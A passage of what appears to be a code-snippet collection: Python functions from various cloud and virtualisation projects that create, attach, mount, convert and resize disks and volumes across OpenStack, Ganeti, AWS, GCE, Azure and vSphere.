line.startswith(\"add\"):\n parts.append(line)\n continue\n logging.error('Skipping unknown line in kpartx output (%s)' % line)\n mapdevs = []\n for line in parts:\n mapdevs.append(line.split(' ')[2])\n for (part, mapdev) in zip(self.partitions, mapdevs):\n part.mapdev = '/dev/mapper/%s' % mapdev\n\n # At this point, all partitions are created and their mapping device has been\n # created and set as .mapdev\n\n # Adds a filesystem to the partition\n logging.info(\"Creating file systems\")\n for part in self.partitions:\n part.mkfs()", "def _load_disk(self):", "def _load_disk(self):", "def attach_device(self, device_data):\n self.attached_device = device_data", "def add_disk_for_vsphere_platform():\n platform = config.ENV_DATA.get(\"platform\").lower()\n lso_type = config.DEPLOYMENT.get(\"type\")\n if platform == constants.VSPHERE_PLATFORM:\n # Types of LSO Deployment\n # Importing here to avoid circular dependency\n from ocs_ci.deployment.vmware import VSPHEREBASE\n\n vsphere_base = VSPHEREBASE()\n\n if lso_type == constants.RDM:\n logger.info(f\"LSO Deployment type: {constants.RDM}\")\n vsphere_base.add_rdm_disks()\n\n if lso_type == constants.VMDK:\n logger.info(f\"LSO Deployment type: {constants.VMDK}\")\n vsphere_base.attach_disk(\n config.ENV_DATA.get(\"device_size\", defaults.DEVICE_SIZE),\n config.DEPLOYMENT.get(\"provision_type\", constants.VM_DISK_TYPE),\n )\n\n if lso_type == constants.DIRECTPATH:\n logger.info(f\"LSO Deployment type: {constants.DIRECTPATH}\")\n vsphere_base.add_pci_devices()\n\n # wipe partition table on newly added PCI devices\n compute_nodes = get_compute_node_names()\n for compute_node in compute_nodes:\n wipe_all_disk_partitions_for_node(compute_node)", "def attach(**_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'attach volume', ctx.target.instance)\n\n if ctx.source.node.properties[constants.ZONE] not in \\\n ctx.target.instance.runtime_properties.get('placement'):\n ctx.logger.info(\n 'Volume Zone {0} and Instance Zone {1} do not match. 
'\n 'This may lead to an error.'.format(\n ctx.source.node.properties[constants.ZONE],\n ctx.target.instance.runtime_properties.get('placement')\n )\n )\n\n if _attach_external_volume_or_instance(instance_id):\n return\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n if constants.VOLUME_CREATING in volume_object.update():\n return ctx.operation.retry(\n message='Waiting for volume to be ready. '\n 'Volume in state {0}'\n .format(volume_object.status))\n elif constants.VOLUME_AVAILABLE not in volume_object.update():\n raise NonRecoverableError(\n 'Cannot attach Volume {0} because it is in state {1}.'\n .format(volume_object.id, volume_object.status))\n\n ctx.logger.debug(\n 'Attempting to attach volume {0} to instance {1}.'\n .format(volume_id, instance_id))\n\n try:\n volume_object.attach(\n instance_id,\n ctx.source.node.properties['device'])\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n ctx.source.instance.runtime_properties['instance_id'] = \\\n instance_id\n ctx.logger.info(\n 'Attached EBS volume {0} with instance {1}.'\n .format(volume_id, instance_id))", "def migrate(self, **kwargs):\n volume_name = kwargs['NAME']\n vm = kwargs['vm']\n volume_info = self.cm.find_name(name=volume_name)\n volume_attached_vm = volume_info[0]['AttachedToVm']\n vm_info = Shell.run(f\"multipass info {vm} --format=json\")\n vm_info = json.loads(vm_info)\n vm_status = vm_info[\"info\"][vm]['state']\n if vm_status == 'running':\n param = {'NAME': volume_name}\n self.detach(**param)\n self.attach(**param, vm=vm)\n try:\n for old_vm in volume_attached_vm:\n volume_info[0]['AttachedToVm'].remove(old_vm)\n except:\n pass\n volume_info[0]['AttachedToVm'].append(vm)\n return volume_info", "def _start_guestfs(self):\n if self.guestfs is None:\n self.guestfs = guestfs.GuestFS()\n self.guestfs.add_drive_opts(self.disks[0], format='qcow2', readonly=0)\n self.guestfs.launch()\n\n partition = self.settings['partition']\n if isinstance(partition, int):\n partition_list = self.guestfs.list_partitions()\n partition_name = partition_list[partition]\n else:\n partition_name = partition\n self.guestfs.mount_options(\"\", partition_name, \"/\")", "def GrowInstanceDisk(self, instance, disk, amount, wait_for_sync=None,\n reason=None):\n body = {\n \"amount\": amount,\n }\n\n _SetItemIf(body, wait_for_sync is not None, \"wait_for_sync\", wait_for_sync)\n\n query = []\n _AppendReason(query, reason)\n\n return self._SendRequest(HTTP_POST,\n (\"/%s/instances/%s/disk/%s/grow\" %\n (GANETI_RAPI_VERSION, instance, disk)),\n query, body)", "def launch_vm(vm_id, vm_metadata):\n print('\\nCreating disk and vm with ID:', vm_id)\n vm_metadata['vm_id'] = vm_id\n ram_mbs, num_cpus, num_gpus = required_resources_for_method(\n vm_metadata['method'],\n bool(vm_metadata['pretrained_r_nets_path']))\n\n create_disk_cmd = (\n 'gcloud compute disks create '\n '\"{disk_name}\" --zone \"{zone}\" --source-snapshot \"{source_snapshot}\" '\n '--type \"pd-standard\" --project=\"{gcloud_project}\" '\n '--size=200GB'.format(\n disk_name=vm_id,\n zone=ZONE,\n source_snapshot=SOURCE_SNAPSHOT,\n gcloud_project=GCLOUD_PROJECT,\n ))\n print('Calling', create_disk_cmd)\n # Don't fail if disk already exists.\n subprocess.call(create_disk_cmd, shell=True)\n\n create_instance_cmd = (\n 'gcloud compute --project={gcloud_project} instances create '\n 
'{instance_name} --zone={zone} --machine-type={machine_type} '\n '--subnet=default --network-tier=PREMIUM --maintenance-policy=TERMINATE '\n '--service-account={service_account} '\n '--scopes=storage-full,compute-rw '\n '--accelerator=type=nvidia-tesla-p100,count={gpu_count} '\n '--disk=name={disk_name},device-name={disk_name},mode=rw,boot=yes,'\n 'auto-delete=yes --restart-on-failure '\n '--metadata-from-file startup-script=./scripts/vm_drop_root.sh '\n '--metadata {vm_metadata} --async'.format(\n instance_name=vm_id,\n zone=ZONE,\n machine_type='custom-{num_cpus}-{ram_mbs}'.format(\n num_cpus=num_cpus, ram_mbs=ram_mbs),\n gpu_count=num_gpus,\n disk_name=vm_id,\n vm_metadata=(\n ','.join('{}={}'.format(k, v) for k, v in vm_metadata.items())),\n gcloud_project=GCLOUD_PROJECT,\n service_account=SERVICE_ACCOUNT,\n ))\n\n print('Calling', create_instance_cmd)\n subprocess.check_call(create_instance_cmd, shell=True)", "def add_vdisk(client, resource_group_name, vm_name, controller=\"1000\",\n independence_mode=\"persistent\", size=16777216):\n from .vendored_sdks.models import VirtualDisk\n\n virtual_machine = client.get(resource_group_name, vm_name)\n disk = VirtualDisk(controller_id=controller,\n independence_mode=independence_mode,\n total_size=size)\n\n virtual_machine.disks.append(disk)\n return client.create_or_update(resource_group_name, vm_name, virtual_machine)", "def create_disk_instance(device, disk_params):\n\n domain_name = device[\"name\"]\n disk_instance_path = \"\"\n\n if \"type\" in disk_params:\n if disk_params[\"type\"] == \"image\" and \"image_id\" in disk_params:\n logger.debug(\"Creating secondary/tertiary Disk information\")\n image_id = disk_params[\"image_id\"]\n disk_image = Image.objects.get(pk=image_id)\n disk_base_path = settings.MEDIA_ROOT + \"/\" + disk_image.filePath.url\n\n disk_instance_path = osUtils.get_instance_path_from_image(disk_base_path,\n domain_name + \"_secondary_image.img\"\n )\n\n if not osUtils.check_path(disk_instance_path):\n if not osUtils.create_thin_provision_instance(disk_base_path,\n domain_name + \"_secondary_image.img\"\n ):\n raise Exception(\"Could not create image instance for image: \" + disk_base_path)\n\n elif disk_params[\"type\"] == \"blank\":\n disk_instance_path = settings.MEDIA_ROOT \\\n + \"/user_images/instances/\" + domain_name + \"_secondary_blank.img\"\n\n disk_size = \"16G\"\n if \"size\" in disk_params:\n disk_size = disk_params[\"size\"]\n\n if not osUtils.check_path(disk_instance_path):\n if not osUtils.create_blank_image(disk_instance_path, disk_size):\n raise Exception(\"Could not create image instance for image: \" + disk_instance_path)\n\n elif disk_params[\"type\"] == \"config_drive\":\n # let's check if config_drive is supported for this vm_type!\n # this is usually used for vMX in openstack, however, we can also use it here for KVM deployments\n disk_instance_path = ''\n if \"configDriveSupport\" in device and device[\"configDriveSupport\"] is True:\n\n logger.debug(\"Lets create a config-drive!\")\n\n # keep a dict of files with format: filename: filecontents\n files = dict()\n params = device[\"configDriveParams\"]\n if \"configDriveParamsFile\" in device and device[\"configDriveParamsFile\"]:\n logger.debug(\"Using inline config_drive format\")\n # behavior change 12-28-2016 - allow passing a list of templates and destinations\n # instead of defining the params directly on the device object\n # if the configDriveParams is a dict, then this is an older topology, leave this code here\n # to still support them 
- otherwise fall through to the isinstance check for list type for\n # newer style configuration\n if isinstance(params, dict):\n name = device[\"configDriveParamsFile\"]\n file_data = \"\"\n # config drive params are usually a dict - to make json serialization easier\n # for our purposes here, let's just make a file with a single key: value per line\n # note, we can add a serialization format to the vm_type.js if needed here\n # only currently used for /boot/loader.conf in vmx and riot\n for k in params:\n file_data += '%s=\"%s\"\\n' % (k, params[k])\n\n files[name] = file_data\n\n # junos customization\n # let's also inject a default config here as well if possible!\n if \"junos\" in device[\"type\"]:\n logger.debug(\"Creating Junos configuration template\")\n junos_config = osUtils.get_junos_default_config_template(device[\"name\"],\n device[\"label\"],\n device[\"password\"],\n device[\"ip\"],\n device[\"managementInterface\"])\n\n if junos_config is not None:\n files[\"/juniper.conf\"] = junos_config\n\n # check for new (12-28-2016) style config drive params definition\n if isinstance(params, list):\n logger.debug(\"params is a list\")\n for p in params:\n if \"template\" in p and \"destination\" in p:\n file_data = None\n file_data = osUtils.compile_config_drive_params_template(\n p[\"template\"],\n device[\"name\"],\n device[\"label\"],\n device[\"password\"],\n device[\"ip\"],\n device[\"managementInterface\"]\n )\n if file_data is not None:\n files[p[\"destination\"]] = file_data\n\n disk_instance_path = osUtils.create_config_drive(device[\"name\"], files)\n if disk_instance_path is None:\n disk_instance_path = ''\n\n logger.debug(\"Using %s\" % disk_instance_path)\n return disk_instance_path", "def attach_volume(self,\n context,\n connection_info,\n instance,\n mountpoint,\n disk_bus=None,\n device_type=None,\n encryption=None):\n\n def _check_available_lun(data_disks):\n # We can attach upto 16 data disks to an instance\n luns = [i.lun for i in data_disks]\n for i in range(1, 16):\n if i not in luns:\n return i\n raise Exception(\"Could not attach volume\")\n\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n lun = _check_available_lun(data_disks)\n name = volume_data['name']\n id = volume_data['id']\n data_disk = {\n 'name': name,\n 'create_option': 'attach',\n 'lun': lun,\n 'managed_disk': {\n 'id': id\n }\n }\n data_disks.append(data_disk)\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Attached volume %s to instance %s\" % (name, instance.uuid))", "def push(self):\n # setup vars\n compute_config = self.config_['compute']\n dt_now = dt.datetime.now()\n if not self.update_data_disks_:\n self.compute_update_data_disks()\n\n # authorize access to GCE api\n auth_http = instance.oauth_authorization(self.config_)\n gce_helper = gce.Gce(auth_http, self.config_, project_id=compute_config['project'])\n\n for zone, disk, update_disk in zip(compute_config['zones'], compute_config['data_disks'], self.update_data_disks_):\n # check for update disk existence\n disk_response = gce_helper.get_disk(update_disk, zone)\n if not disk_response:\n logging.error('Update disk %s does not exist' %(update_disk))\n continue\n\n # generate backup disk filename\n backup_disk = '%s-backup-%s-%s-%s-%sh-%sm-%ss' %(disk, 
dt_now.month, dt_now.day, dt_now.year, dt_now.hour, dt_now.minute, dt_now.second) \n\n # snapshot the updated data disks\n snapshot_response = gce_helper.snapshot_disk(update_disk, compute_config['project'], zone)\n\n # delete previous disk and replace, if not in use\n disk_response = gce_helper.get_disk(disk, zone)\n if disk_response:\n if USERS_KEY not in disk_response.keys() or (USERS_KEY in disk_response.keys() and len(disk_response[USERS_KEY]) == 0):\n # create new disk from snapshot\n gce_helper.delete_disk(disk)\n gce_helper.create_disk(disk, zone=zone, size_gb=compute_config['disk_size_gb'],\n source_snapshot=snapshot_response['snapshot_name'])\n\n # delete update disk (don't delete if push can't be done now, otherwise changes won't be overwritten)\n gce_helper.delete_disk(update_disk)\n\n elif USERS_KEY in disk_response.keys() and len(disk_response[USERS_KEY]) > 0:\n # stage the push for a future time\n logging.info('Master disk in use. Staging backup disk for a future push')\n push_queue_filename = os.path.join(self.cache_dir_, PUSH_QUEUE_FILE)\n f = open(push_queue_filename, 'a')\n f.write(backup_disk + '\\n')\n else:\n logging.warning('Master disk was not found') \n\n # create backup disk from snapshot\n gce_helper.create_disk(backup_disk, zone=zone, size_gb=compute_config['disk_size_gb'],\n source_snapshot=snapshot_response['snapshot_name'])\n\n # delete the snapshot\n ss_del_response = gce_helper.delete_snapshot(snapshot_name=snapshot_response['snapshot_name'], project=compute_config['project'])\n return True", "def extend_volume(self, volume, new_size):\n LOG.info('Extending volume: %(id)s New size: %(size)s GB',\n {'id': volume['id'], 'size': new_size})\n nfs_share = volume['provider_location']\n nms = self.share2nms[nfs_share]\n volume_path = self.remote_path(volume)\n if getattr(self.configuration,\n self.driver_prefix + '_sparsed_volumes'):\n self._create_sparsed_file(nms, volume_path, new_size)\n else:\n block_size_mb = 1\n block_count = ((new_size - volume['size']) * units.Gi /\n (block_size_mb * units.Mi))\n\n nms.appliance.execute(\n 'dd if=/dev/zero seek=%(seek)d of=%(path)s'\n ' bs=%(bs)dM count=%(count)d' % {\n 'seek': volume['size'] * units.Gi / block_size_mb,\n 'path': volume_path,\n 'bs': block_size_mb,\n 'count': block_count\n }\n )", "def _unlock_singlepass_encrypted_disk_fallback(source_vm, resource_group_name, repair_vm_name, repair_group_name, copy_disk_name, is_linux):\n\n # Installs the extension on repair VM and mounts the disk after unlocking.\n encryption_type, key_vault, kekurl, secreturl = _fetch_encryption_settings(source_vm)\n if is_linux:\n volume_type = 'DATA'\n else:\n volume_type = 'ALL'\n\n try:\n if encryption_type is Encryption.SINGLE_WITH_KEK:\n install_ade_extension_command = 'az vm encryption enable --disk-encryption-keyvault {vault} --name {repair} --resource-group {g} --key-encryption-key {kek_url} --volume-type {volume}' \\\n .format(g=repair_group_name, repair=repair_vm_name, vault=key_vault, kek_url=kekurl, volume=volume_type)\n elif encryption_type is Encryption.SINGLE_WITHOUT_KEK:\n install_ade_extension_command = 'az vm encryption enable --disk-encryption-keyvault {vault} --name {repair} --resource-group {g} --volume-type {volume}' \\\n .format(g=repair_group_name, repair=repair_vm_name, vault=key_vault, volume=volume_type)\n # Add format-all flag for linux vms\n if is_linux:\n install_ade_extension_command += \" --encrypt-format-all\"\n logger.info('Unlocking attached copied disk...')\n 
_call_az_command(install_ade_extension_command)\n # Linux VM encryption extension has a bug and we need to manually unlock and mount its disk\n if is_linux:\n # Validating secret tag and setting original tag if it got changed\n _secret_tag_check(resource_group_name, copy_disk_name, secreturl)\n logger.debug(\"Manually unlocking and mounting disk for Linux VMs.\")\n _unlock_mount_linux_encrypted_disk(repair_vm_name, repair_group_name)\n except AzCommandError as azCommandError:\n error_message = str(azCommandError)\n # Linux VM encryption extension bug where it fails and then continue to mount disk manually\n if is_linux and \"Failed to encrypt data volumes with error\" in error_message:\n logger.debug(\"Expected bug for linux VMs. Ignoring error.\")\n # Validating secret tag and setting original tag if it got changed\n _secret_tag_check(resource_group_name, copy_disk_name, secreturl)\n _unlock_mount_linux_encrypted_disk(repair_vm_name, repair_group_name)\n else:\n raise", "def add_partitions(self, disk):\n for partition in self.partitions:\n if 'Extended' in partition.get_type():\n with open(disk, 'rb') as hd:\n hd.seek(partition.read_start)\n new_mbr = Mbr(hd.read(512), lba_offset=partition.lba)\n self.partitions.extend(new_mbr.partitions)\n\n new_mbr.add_partitions(disk)", "def pull_disk(self, disk, update_fields=None):\n import_time = timezone.now()\n imported_disk = self.import_disk(\n disk.vm.backend_id, disk.backend_id, save=False\n )\n\n disk.refresh_from_db()\n if disk.modified < import_time:\n if not update_fields:\n update_fields = models.Disk.get_backend_fields()\n\n update_pulled_fields(disk, imported_disk, update_fields)", "def setup_device(device):\n try:\n # Gets around \"Resource busy\" errors\n device.detach_kernel_driver(0)\n except Exception:\n pass\n device.set_configuration()", "def swap_volume(self, old_connection_info, new_connection_info,\n instance, mountpoint, resize_to):", "def migrate_volume(self, ctxt, volume_id, host, force_host_copy=False):\n return", "def attach_volume(self, server, volume, device=None, tag=None):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n # On teardown detach the volume and for multiattach volumes wait for\n # the attachment to be removed. For non-multiattach volumes wait for\n # the state of the volume to change to available. This is so we don't\n # error out when trying to delete the volume during teardown.\n if volume['multiattach']:\n att = waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n self.addCleanup(waiters.wait_for_volume_attachment_remove,\n self.volumes_client, volume['id'],\n att['attachment_id'])\n else:\n self.addCleanup(waiters.wait_for_volume_resource_status,\n self.volumes_client, volume['id'], 'available')\n waiters.wait_for_volume_resource_status(self.volumes_client,\n volume['id'], 'in-use')\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n self.addCleanup(self._detach_volume, server, volume)\n return attachment", "def mount(self, fstype, export, vol_name, mountpoint, instance, options):\n\n # NOTE(mdbooth): mount() may currently be called multiple times for a\n # single attachment. 
Any operation which calls\n # LibvirtDriver._hard_reboot will re-attach volumes which are probably\n # already attached, resulting in multiple mount calls.\n\n LOG.debug('_HostMountState.mount(fstype=%(fstype)s, '\n 'export=%(export)s, vol_name=%(vol_name)s, %(mountpoint)s, '\n 'options=%(options)s) generation %(gen)s',\n {'fstype': fstype, 'export': export, 'vol_name': vol_name,\n 'mountpoint': mountpoint, 'options': options,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n if os.path.ismount(mountpoint):\n LOG.debug(('Mounting %(mountpoint)s generation %(gen)s, '\n 'mountpoint already mounted'),\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n else:\n LOG.debug('Mounting %(mountpoint)s generation %(gen)s',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n\n fileutils.ensure_tree(mountpoint)\n\n try:\n nova.privsep.fs.mount(fstype, export, mountpoint, options)\n except processutils.ProcessExecutionError:\n # Check to see if mountpoint is mounted despite the error\n # eg it was already mounted\n if os.path.ismount(mountpoint):\n # We're not going to raise the exception because we're\n # in the desired state anyway. However, this is still\n # unusual so we'll log it.\n LOG.exception(\n 'Error mounting %(fstypes export %(export)s on '\n '%(mountpoint)s. Continuing because mountpount is '\n 'mounted despite this.',\n {'fstype': fstype, 'export': export,\n 'mountpoint': mountpoint}, instance=instance)\n else:\n # If the mount failed there's no reason for us to keep\n # a record of it. It will be created again if the\n # caller retries.\n\n # Delete while holding lock\n del self.mountpoints[mountpoint]\n\n raise\n\n mount.add_attachment(vol_name, instance.uuid)\n\n LOG.debug('_HostMountState.mount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def createDisk(instanceID, devicePrefix, raidDevice, numVolumes, volumeSize,\n mountPath, namePrefix):\n assert numVolumes > 0\n assert 0 < volumeSize < 1000\n if numVolumes > 1:\n assert raidDevice is not None\n\n print 'Getting instance information.'\n ec2 = EC2Connection()\n instance = ec2.get_all_instances([instanceID])[0].instances[0]\n zone = instance.placement\n\n volumes = []\n for i in range(numVolumes):\n device = devicePrefix + str(i + 1)\n print 'Creating volume for', device\n volume = ec2.create_volume(volumeSize, zone)\n volume.attach(instanceID, device)\n volumes.append(volume)\n if namePrefix is not None:\n volume.add_tag(\n 'Name', '{0} ({1})'.format(namePrefix, device.split('/')[-1]))\n\n pendingVolumes = set(volumes)\n while pendingVolumes:\n print 'Attaching volumes.', len(pendingVolumes), 'remaining.'\n time.sleep(1)\n for volume in list(pendingVolumes):\n try:\n volume.update()\n except EC2ResponseError:\n print 'Response error.'\n print \"Don't panic, this usually happens, trying again.\"\n if volume.attachment_state() == u'attached':\n pendingVolumes.remove(volume)\n\n print 'All volumes attached: ', ''.join(volume.id for volume in volumes)\n\n env.host_string = instance.dns_name\n\n if len(volumes) > 1:\n sudo('DEBIAN_FRONTEND=noninteractive apt-get install -y mdadm')\n print 'Creating RAID array.'\n devices = [volume.attach_data.device.replace('/dev/sd', '/dev/xvd')\n for volume in volumes]\n devices = ' '.join(devices)\n sudo('mdadm --create {0} --level raid10 --auto=yes --assume-clean '\n '--raid-devices {1} 
{2}'.format(raidDevice, numVolumes, devices))\n sudo('echo DEVICE {0} >> /etc/mdadm/mdadm.conf'.format(devices))\n sudo('mdadm --detail --scan | grep {0} | '\n 'sudo tee -a /etc/mdadm/mdadm.conf'.format(raidDevice))\n\n # Tell the kernel to use the specified configurationg, otherwise it\n # will use something like /dev/md127\n sudo('update-initramfs -u')\n\n device = raidDevice\n else:\n device = volumes[0].attach_data.device.replace('/dev/sd', '/dev/xvd')\n\n print 'Formating device.'\n sudo('mkfs.ext4 {0}'.format(device))\n sudo('echo \"{0} {1} ext4 noatime 0 0\" >> /etc/fstab'.format(device,\n mountPath))\n\n print 'Mounting device.'\n sudo('mkdir -p {0}'.format(mountPath))\n sudo('mount %s' % mountPath)\n print 'Success.'", "def prepare_disks_with_fs_for_vm(storage_domain, vm_name, executor=None):\n disk_ids = list()\n mount_points = list()\n disk_names = []\n disk_interfaces = []\n logger.info('Creating disks for test')\n disks = start_creating_disks_for_test(sd_name=storage_domain)\n for disk in disks:\n disk_names.append(disk['disk_name'])\n disk_interfaces.append(disk['disk_interface'])\n disk_ids.append(ll_disks.get_disk_obj(disk['disk_name']).get_id())\n\n assert ll_disks.wait_for_disks_status(\n disk_names, timeout=CREATION_DISKS_TIMEOUT\n ), \"Some disks are still locked\"\n logger.info(\"Attaching and activating disks %s\", disk_names)\n prepare_disks_for_vm(vm_name, disk_names, interfaces=disk_interfaces)\n\n if ll_vms.get_vm_state(vm_name) == config.VM_DOWN:\n ll_vms.startVm(\n True, vm_name, wait_for_status=config.VM_UP, wait_for_ip=True\n )\n if not executor:\n executor = get_vm_executor(vm_name)\n logger.info(\"Creating filesystems on disks %s\", disks)\n\n with ThreadPoolExecutor(max_workers=len(disk_names)) as thread_executor:\n for disk_alias in disk_names:\n result = thread_executor.submit(\n create_fs_on_disk, vm_name=vm_name, disk_alias=disk_alias,\n executor=executor\n )\n ecode = result.result()[0]\n mount_point = result.result()[1]\n if not ecode:\n logger.error(\n \"Cannot create filesysem on disk %s:\", disk_alias\n )\n mount_point = ''\n mount_points.append(mount_point)\n logger.info(\n \"Mount points for new disks: %s\", mount_points\n )\n return disk_ids, mount_points", "def setDiskStoragePath(self, path):\n self.disk_storage_path = path", "def set_vm_storage_profile(vm, profile):\n\n spec = vim.vm.ConfigSpec()\n profile_specs = []\n profile_spec = vim.vm.DefinedProfileSpec()\n profile_spec.profileId = profile.profileId.uniqueId\n profile_specs.append(profile_spec)\n spec.vmProfile = profile_specs\n vm.ReconfigVM_Task(spec)", "def attach_volume(self, server, volume, device=None, tag=None,\n wait_for_detach=True):\n attach_kwargs = dict(volumeId=volume['id'])\n if device:\n attach_kwargs['device'] = device\n if tag:\n attach_kwargs['tag'] = tag\n\n attachment = self.servers_client.attach_volume(\n server['id'], **attach_kwargs)['volumeAttachment']\n\n # NOTE(lyarwood): During attach we initially wait for the volume\n # attachment and then check the volume state.\n waiters.wait_for_volume_attachment_create(\n self.volumes_client, volume['id'], server['id'])\n # TODO(lyarwood): Remove the following volume status checks and move to\n # attachment status checks across all volumes now with the 3.27\n # microversion somehow.\n if not volume['multiattach']:\n waiters.wait_for_volume_resource_status(\n self.volumes_client, volume['id'], 'in-use')\n\n # NOTE(lyarwood): On teardown (LIFO) initially wait for the volume\n # attachment in Nova to be removed. 
While this technically happens last\n # we want this to be the first waiter as if it fails we can then dump\n # the contents of the console log. The final check of the volume state\n # should be a no-op by this point and is just added for completeness\n # when detaching non-multiattach volumes.\n if not volume['multiattach'] and wait_for_detach:\n self.addCleanup(\n waiters.wait_for_volume_resource_status, self.volumes_client,\n volume['id'], 'available')\n self.addCleanup(\n waiters.wait_for_volume_attachment_remove_from_server,\n self.servers_client, server['id'], volume['id'])\n self.addCleanup(self._detach_volume, server, volume)\n\n return attachment", "def mount(fstype, export, vol_name, mountpoint, instance, options=None):\n with __manager__.get_state() as mount_state:\n mount_state.mount(fstype, export, vol_name, mountpoint, instance,\n options)", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def manual_driving(self):\n\n self.start_driving()", "def physical_disks(self, physical_disks):\n\n self._physical_disks = physical_disks", "def _ConvertInstanceDisks(self, feedback_fn):\n template_info = self.op.disk_template\n if self.op.disk_template == constants.DT_EXT:\n template_info = \":\".join([self.op.disk_template,\n self.op.ext_params[\"provider\"]])\n\n old_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)\n feedback_fn(\"Converting disk template from '%s' to '%s'\" %\n (old_template, template_info))\n\n assert not (old_template in constants.DTS_NOT_CONVERTIBLE_FROM or\n self.op.disk_template in constants.DTS_NOT_CONVERTIBLE_TO), \\\n (\"Unsupported disk template conversion from '%s' to '%s'\" %\n (old_template, self.op.disk_template))\n\n pnode_uuid = self.instance.primary_node\n snode_uuid = []\n if self.op.remote_node_uuid:\n snode_uuid = [self.op.remote_node_uuid]\n\n old_disks = self.cfg.GetInstanceDisks(self.instance.uuid)\n\n feedback_fn(\"Generating new '%s' disk template...\" % template_info)\n file_storage_dir = CalculateFileStorageDir(\n self.op.disk_template, self.cfg, self.instance.name,\n file_storage_dir=self.op.file_storage_dir)\n new_disks = GenerateDiskTemplate(self,\n self.op.disk_template,\n self.instance.uuid,\n pnode_uuid,\n snode_uuid,\n self.disks_info,\n file_storage_dir,\n self.op.file_driver,\n 0,\n feedback_fn,\n self.diskparams)\n\n # Create the new block devices for the instance.\n feedback_fn(\"Creating new empty disks of type 
'%s'...\" % template_info)\n try:\n CreateDisks(self, self.instance, disk_template=self.op.disk_template,\n disks=new_disks)\n except errors.OpExecError:\n self.LogWarning(\"Device creation failed\")\n for disk in new_disks:\n self.cfg.ReleaseDRBDMinors(disk.uuid)\n raise\n\n # Transfer the data from the old to the newly created disks of the instance.\n feedback_fn(\"Populating the new empty disks of type '%s'...\" %\n template_info)\n for idx, (old, new) in enumerate(zip(old_disks, new_disks)):\n feedback_fn(\" - copying data from disk %s (%s), size %s\" %\n (idx, old.dev_type,\n utils.FormatUnit(new.size, \"h\")))\n if old.dev_type == constants.DT_DRBD8:\n old = old.children[0]\n result = self.rpc.call_blockdev_convert(pnode_uuid, (old, self.instance),\n (new, self.instance))\n msg = result.fail_msg\n if msg:\n # A disk failed to copy. Abort the conversion operation and rollback\n # the modifications to the previous state. The instance will remain\n # intact.\n if self.op.disk_template == constants.DT_DRBD8:\n new = new.children[0]\n self.Log(\" - ERROR: Could not copy disk '%s' to '%s'\" %\n (old.logical_id[1], new.logical_id[1]))\n try:\n self.LogInfo(\"Some disks failed to copy\")\n self.LogInfo(\"The instance will not be affected, aborting operation\")\n self.LogInfo(\"Removing newly created disks of type '%s'...\" %\n template_info)\n RemoveDisks(self, self.instance, disks=new_disks)\n self.LogInfo(\"Newly created disks removed successfully\")\n finally:\n for disk in new_disks:\n self.cfg.ReleaseDRBDMinors(disk.uuid)\n result.Raise(\"Error while converting the instance's template\")\n\n # In case of DRBD disk, return its port to the pool\n for disk in old_disks:\n if disk.dev_type == constants.DT_DRBD8:\n tcp_port = disk.logical_id[2]\n self.cfg.AddTcpUdpPort(tcp_port)\n\n # Remove old disks from the instance.\n feedback_fn(\"Detaching old disks (%s) from the instance and removing\"\n \" them from cluster config\" % old_template)\n for old_disk in old_disks:\n self.cfg.RemoveInstanceDisk(self.instance.uuid, old_disk.uuid)\n\n # Attach the new disks to the instance.\n feedback_fn(\"Adding new disks (%s) to cluster config and attaching\"\n \" them to the instance\" % template_info)\n for (idx, new_disk) in enumerate(new_disks):\n self.cfg.AddInstanceDisk(self.instance.uuid, new_disk, idx=idx)\n\n # Re-read the instance from the configuration.\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n # Release node locks while waiting for sync and disks removal.\n ReleaseLocks(self, locking.LEVEL_NODE)\n\n disk_abort = not WaitForSync(self, self.instance,\n oneshot=not self.op.wait_for_sync)\n if disk_abort:\n raise errors.OpExecError(\"There are some degraded disks for\"\n \" this instance, please cleanup manually\")\n\n feedback_fn(\"Removing old block devices of type '%s'...\" % old_template)\n RemoveDisks(self, self.instance, disks=old_disks)\n\n # Node resource 